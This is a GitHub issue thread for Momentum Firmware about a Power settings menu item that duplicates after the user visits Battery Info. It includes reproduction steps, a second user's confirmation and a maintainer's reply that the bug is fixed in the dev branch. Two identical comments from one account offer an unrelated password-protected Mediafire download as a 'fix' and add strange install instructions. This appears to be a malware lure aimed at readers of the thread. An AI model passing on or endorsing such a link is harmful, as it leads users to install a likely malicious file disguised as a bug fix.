### ISSUE TITLE
Duplicated item in Settings-Power page

### ISSUE THREAD

**Issue by littlecxm** [Next-Flip/Momentum-Firmware#195]
### Describe the bug.

idk whether ofw bug or exists in both.
![ezgif-2-2ef38eea2c](https://github.com/user-attachments/assets/05ff91b7-c9f5-4e16-998f-0c1e9b0f99ec)

### Reproduction

1. Go `Settings` page
2. Go `Power`
3. Go `Battery Info`
4. Back to `Power`

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Chuck3CZ** [comment]
I discover it now too, it duplicate every time when you go back from Battery Info, Only first buttons work then, duplicated buttons don't work.
//edit: mmnt006-26_08_2024

**Comment by WillyJL** [comment]
It's already fixed in dev branch
